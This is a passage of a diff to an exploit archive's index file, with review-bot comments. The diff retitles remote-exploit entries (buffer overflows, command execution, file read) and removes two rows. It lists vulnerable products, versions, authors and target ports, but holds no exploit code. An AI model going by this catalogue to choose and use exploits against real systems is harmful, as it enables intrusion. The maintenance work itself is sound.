@@ -9570,7 +9585,7 @@ id,file,description,date,author,platform,type,port 652,platforms/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow",2004-11-23,"Serkan Akpolat",linux,remote,8080 654,platforms/windows/remote/654.c,"Winamp 5.06 - 'IN_CDDA.dll' Remote Buffer Overflow",2004-11-24,k-otik,windows,remote,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,windows,remote,143 -660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote",2004-11-27,"Gyan Chawdhary",linux,remote,80 +660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - 'memory_limit' Remote Overflow",2004-11-27,"Gyan Chawdhary",linux,remote,80 663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)",2004-11-29,muts,windows,remote,143 668,platforms/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143 670,platforms/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143 
@@ -9580,7 +9595,7 @@ id,file,description,date,author,platform,type,port 693,platforms/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,windows,remote,21 705,platforms/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,multiple,remote,10000 711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,21 -712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote",2004-12-23,pucik,linux,remote,8000 +712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow",2004-12-23,pucik,linux,remote,8000 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Buffer Overflow",2004-12-24,"Marco Ivaldi",solaris,remote,513 719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer (Windows XP SP2) - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 726,platforms/windows/remote/726.c,"Netcat 1.1 - '-e' Switch Remote Buffer Overflow",2004-12-26,class101,windows,remote,0 
@@ -9592,7 +9607,6 @@ id,file,description,date,author,platform,type,port 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,windows,remote,6101 753,platforms/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)",2005-01-12,Skylined,windows,remote,0 -758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,osx,remote,0 759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode",2005-01-16,ATmaCA,windows,remote,0 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162 764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow",2003-04-04,spabam,unix,remote,80 
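Review bot: 758 ("Apple iTunes - Playlist Parsing Local Buffer Overflow", platforms/osx/remote, type remote) is removed without a replacement line (-7,+6); as with the other local-in-remote rows dropped in this commit, confirm the row and file reappear under a local path elsewhere in the patch.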
@@ -9604,7 +9618,7 @@ id,file,description,date,author,platform,type,port 784,platforms/linux/remote/784.c,"ngIRCd 0.8.2 - Remote Format String",2005-02-03,CoKi,linux,remote,6667 785,platforms/linux/remote/785.c,"Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2)",2005-02-03,cybertronic,linux,remote,119 787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow",2005-02-04,CorryL,windows,remote,80 -794,platforms/windows/remote/794.c,"3CServer 1.1 (FTP Server) - Remote",2005-02-07,mandragore,windows,remote,21 +794,platforms/windows/remote/794.c,"3CServer 1.1 (FTP Server) - Remote Overflow",2005-02-07,mandragore,windows,remote,21 802,platforms/windows/remote/802.cpp,"MSN Messenger - '.png' Image Buffer Overflow Download Shellcode",2005-02-09,ATmaCA,windows,remote,0 804,platforms/windows/remote/804.c,"MSN Messenger (Linux) - '.png' Image Buffer Overflow",2005-02-09,dgr,windows,remote,0 805,platforms/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell",2005-02-09,n4rk0tix,multiple,remote,8080 
@@ -9618,7 +9632,7 @@ id,file,description,date,author,platform,type,port 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow",2005-02-18,class101,windows,remote,21 828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Code Execution",2005-02-18,"John Doe",multiple,remote,617 829,platforms/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,hardware,remote,80 -830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote",2005-02-19,mandragore,windows,remote,8000 +830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow",2005-02-19,mandragore,windows,remote,8000 831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow",2005-02-20,jsk,linux,remote,5803 845,platforms/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 847,platforms/windows/remote/847.cpp,"BadBlue 2.55 - Web Server Remote Buffer Overflow",2005-02-27,tarako,windows,remote,80 
@@ -9627,14 +9641,14 @@ id,file,description,date,author,platform,type,port 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow",2005-03-13,class101,windows,remote,5093 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0 -879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - 'GET' Remote",2005-03-14,lammat,multiple,remote,0 +879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read",2005-03-14,lammat,multiple,remote,0 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21 -903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote",2005-03-29,crash-x,linux,remote,143 +903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Overflow",2005-03-29,crash-x,linux,remote,143 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,windows,remote,42 -915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - IMAPd Remote",2005-04-05,Expanders,linux,remote,143 +915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - IMAPd Remote Overflow",2005-04-05,Expanders,linux,remote,143 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory 
Corruption",2005-04-12,Skylined,windows,remote,0 934,platforms/linux/remote/934.c,"gld 1.4 - Postfix Greylisting Daemon Remote Format String",2005-04-13,Xpl017Elz,linux,remote,2525 940,platforms/linux/remote/940.c,"Sumus 0.2.2 - HTTPd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 
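Review bot: the 879 rename to "'GET' Remote File Read" asserts a specific vulnerability class rather than the generic "Remote Overflow" given to 903 and 915 in the same hunk; please confirm against 879.pl that the LimeWire issue is a file disclosure, since a wrong class in a description is harder to spot later than a bare one.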
@@ -9669,21 +9683,21 @@ id,file,description,date,author,platform,type,port 1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String",2005-06-20,darkeagle,linux,remote,7144 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)",2005-06-24,eyas,windows,remote,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing - Buffer Overflow Universal (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 -1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote",2005-07-05,k-otik,windows,remote,0 +1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow",2005-07-05,k-otik,windows,remote,0 1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client",2005-07-03,"Kevin Finisterre",hardware,remote,0 1089,platforms/windows/remote/1089.c,"Mozilla FireFox 1.0.1 - Remote GIF Heap Overflow",2005-07-05,darkeagle,windows,remote,0 1096,platforms/windows/remote/1096.txt,"Hosting Controller 0.6.1 HotFix 2.1 - Change Credit Limit",2005-07-10,"Soroush Dalili",windows,remote,0 1099,platforms/windows/remote/1099.pl,"Baby Web Server 2.6.2 - Command Validation",2005-07-11,basher13,windows,remote,0 1102,platforms/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution",2005-07-13,"Michael Krax",windows,remote,0 1108,platforms/windows/remote/1108.pl,"Small HTTP Server 3.05.28 - Arbitrary Data Execution",2005-07-15,basher13,windows,remote,0 -1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II - Generic Remote",2000-12-21,DiGiT,multiple,remote,5555 +1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II - Generic Remote Command Execution",2000-12-21,DiGiT,multiple,remote,5555 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,windows,remote,0 
1118,platforms/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow",2005-07-25,redsand,windows,remote,21 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String",2005-08-01,CoKi,linux,remote,143 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution",2005-08-01,kingcope,linux,remote,143 -1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote",2005-08-03,cybertronic,windows,remote,6070 +1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 -1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Overflow",2005-08-03,cybertronic,windows,remote,6070 +1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Remote Overflow",2005-08-03,cybertronic,windows,remote,6070 1138,platforms/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution",2005-08-05,CoKi,linux,remote,0 1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String",2005-08-06,vade79,linux,remote,0 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 
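Review bot: 1079 ("'javaprxy.dll' COM Object Remote Overflow") is fixed, but the 1144 context line "Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote (MS05-038)" in the same hunk is the same kind of entry and keeps the bare wording; give it the same suffix. 1114 is renamed to "Generic Remote Command Execution"; confirm from 1114.c that the outcome is command execution rather than an overflow before committing to that class.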
@@ -9700,8 +9714,8 @@ id,file,description,date,author,platform,type,port 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service (French) - Remote Universal (MS05-039)",2005-08-25,"Fabrice Mourron",windows,remote,445 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC < 1.22_A /BFVCC < 2.14_B / BF2CC) - Authentication Bypass / Password Stealer / Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,windows,remote,80 -1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote",2005-08-30,Lympex,multiple,remote,0 -1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote",2005-08-31,jpno5,windows,remote,6129 +1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Command Execution",2005-08-30,Lympex,multiple,remote,0 +1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Overflow",2005-08-31,jpno5,windows,remote,6129 1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,windows,remote,0 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 - Command Execution",2005-09-07,basher13,windows,remote,0 1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - 'Search' Remote Format String",2005-09-10,"Clément Lecigne",linux,remote,143 
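Review bot: 1188 and 1190 are normalised, but the 1180 context line "Microsoft Windows Plug-and-Play Service (French) - Remote Universal (MS05-039)" keeps the bare "Remote Universal" form; rename it in the same pass.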
@@ -9720,9 +9734,9 @@ id,file,description,date,author,platform,type,port 1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM 'log_security()' Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 -1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote",2005-10-20,"Kevin Finisterre",multiple,remote,13722 -1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote",2005-10-20,"Kevin Finisterre",win_x86,remote,13722 -1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote",2005-10-20,"Kevin Finisterre",osx,remote,13722 +1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",multiple,remote,13722 +1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",win_x86,remote,13722 +1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",osx,remote,13722 1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode",2005-10-29,ATmaCA,windows,remote,0 1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 
@@ -9743,7 +9757,7 @@ id,file,description,date,author,platform,type,port 1366,platforms/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)",2005-12-09,"H D Moore",windows,remote,0 1369,platforms/multiple/remote/1369.html,"Mozilla Firefox 1.04 - 'compareTo()' Remote Code Execution",2005-12-12,"Aviv Raff",multiple,remote,0 1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC)",2005-12-15,"Mariano Nuñez",windows,remote,0 -1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - PH SERVER Remote",2005-12-16,kingcope,windows,remote,105 +1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow",2005-12-16,kingcope,windows,remote,105 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - 'EXAMINE' Buffer Overflow",2005-12-19,muts,windows,remote,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - 'IMAPd' Remote Overflow",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - 'APPE' Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21 
@@ -9861,7 +9875,7 @@ id,file,description,date,author,platform,type,port 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote,0 2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25 2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b - 'GET' Arbitrary File Download",2006-10-24,prdelka,windows,remote,143 -2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote",2006-10-24,prdelka,hardware,remote,0 +2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote File System Access",2006-10-24,prdelka,hardware,remote,0 2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (1)",2006-10-25,Expanders,windows,remote,25 2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User",2006-10-25,"Greg Linares",windows,remote,0 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0 
@@ -9881,11 +9895,10 @@ id,file,description,date,author,platform,type,port 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 2809,platforms/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445 -2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0 2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - 'read/write/execute' ation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 2858,platforms/linux/remote/2858.c,"Evince Document Viewer - 'DocumentMedia' Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0 -2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69 +2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - ActiveX Control Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 
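Review bot: the row for 2821 (XMPlay 3.3.0.4 '.PLS' Local/Remote Buffer Overflow, platforms/windows/remote/2821.c) is deleted here with no replacement row in view, so the index loses the entry unless it is re-added under another platform/type elsewhere in this commit; confirm the file was moved along with it, because a row pointing at a path that no longer exists, or an orphaned file with no row, is exactly what files.csv is meant to prevent. While this hunk is open, the context row 2837 still reads "Oracle 9i/10g - 'read/write/execute' ation Suite", which looks truncated (the word before "ation" is missing) and should be repaired in the same pass.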
@@ -9965,17 +9978,17 @@ id,file,description,date,author,platform,type,port 3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution (PoC)",2007-03-15,"Core Security",bsd,remote,0 3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",windows,remote,6503 3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",windows,remote,554 -3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote",2007-03-21,"Winny Thomas",windows,remote,143 +3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow",2007-03-21,"Winny Thomas",windows,remote,143 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69 -3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - Dynamic DNS Updates Remote",2007-03-22,"Andres Tarasco",windows,remote,0 +3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - Dynamic DNS Update/Change",2007-03-22,"Andres Tarasco",windows,remote,0 3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage",2007-03-23,"Jon Hart",multiple,remote,0 3561,platforms/windows/remote/3561.pl,"Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - 'USER' Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21 3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer 
Overflow",2007-03-25,Heretic2,windows,remote,0 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double-Free Memory (MS07-009)",2007-03-26,anonymous,windows,remote,0 -3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote",2007-03-26,"Winny Thomas",windows,remote,21 +3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow",2007-03-26,"Winny Thomas",windows,remote,21 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g - KUPM$MCP.MAIN SQL Injection",2007-03-27,bunker,multiple,remote,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow (Metasploit)",2007-03-27,skillTube,windows,remote,80 
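Review bot: the hunk fixes the dangling "Remote" on 3537 but leaves 3540, one line below, as "Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)", which has the same problem for the same product; suggest "IMAP Remote Overflow (Egghunter)" so the two Mercur rows match. Separately, 3544's new title "Microsoft DNS Server - Dynamic DNS Update/Change" names an action rather than an issue and is the only rename in this commit that removes "Remote" instead of qualifying it; if the point of the code is that the server accepts the update without authorisation, say so in the title so the row is searchable like its neighbours.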
@@ -9983,7 +9996,7 @@ id,file,description,date,author,platform,type,port 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0 3615,platforms/lin_x86/remote/3615.c,"dproxy-nexgen (Linux x86) - Buffer Overflow",2007-03-30,mu-b,lin_x86,remote,53 -3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote",2007-03-31,muts,windows,remote,143 +3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Overflow",2007-03-31,muts,windows,remote,143 3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143 3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0 3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)",2007-04-01,"Trirat Puttaraksa",windows,remote,0 
@@ -10042,11 +10055,11 @@ id,file,description,date,author,platform,type,port 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method",2007-05-30,shinnai,windows,remote,0 4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - IMAP FLAGS Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0 -4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote",2007-05-31,rgod,windows,remote,0 +4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Overflow",2007-05-31,rgod,windows,remote,0 4016,platforms/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass",2007-05-31,Sha0,windows,remote,0 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow",2007-06-01,shinnai,windows,remote,0 4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow",2007-06-02,rgod,windows,remote,0 -4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote",2007-06-03,muts,windows,remote,8080 +4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote Overflow (Egghunter)",2007-06-03,muts,windows,remote,8080 4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,tru64,remote,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow",2007-06-07,Excepti0n,windows,remote,0 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)",2007-06-07,Excepti0n,windows,remote,0 
@@ -10070,11 +10083,11 @@ id,file,description,date,author,platform,type,port 4143,platforms/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - Buffer Overflow",2007-07-03,shinnai,windows,remote,0 4146,platforms/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 < 9.2sp1 - Remote Buffer Overflow",2007-07-03,Heretic2,windows,remote,5151 4152,platforms/windows/remote/4152.py,"ViRC 2.0 - JOIN Response Remote Overwrite (SEH)",2007-07-06,h07,windows,remote,0 -4155,platforms/windows/remote/4155.html,"HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()'",2007-07-06,shinnai,windows,remote,0 +4155,platforms/windows/remote/4155.html,"HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' File Write",2007-07-06,shinnai,windows,remote,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0 -4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote",2007-07-08,Xpl017Elz,linux,remote,80 +4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote 